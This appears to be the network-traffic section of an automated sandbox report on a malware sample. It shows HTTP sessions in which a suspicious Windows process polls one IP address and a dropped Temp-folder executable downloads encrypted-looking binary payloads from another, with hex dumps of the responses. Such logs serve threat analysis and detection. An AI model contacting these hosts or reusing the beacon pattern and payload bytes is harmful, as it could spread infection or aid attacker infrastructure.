                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.84972791.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:18.379914999 CEST166OUTGET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:18.725898027 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:18 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:20.747984886 CEST166OUTGET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:21.096507072 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:20 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.84972991.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:23.477629900 CEST166OUTGET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:23.832170963 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.84973091.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:26.216587067 CEST166OUTGET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:26.571116924 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:26 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.84973291.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:28.960473061 CEST166OUTGET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:29.309212923 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.84973391.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:31.698714018 CEST166OUTGET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:32.053797960 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.849737185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:40.838985920 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:41.181057930 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:41 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:41.181135893 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:41.181152105 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:41.181360006 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:23:41.181449890 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:23:41.181508064 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:23:41.181555033 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:23:41.181571007 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.849739185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:43.559075117 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:43.898837090 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:43 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
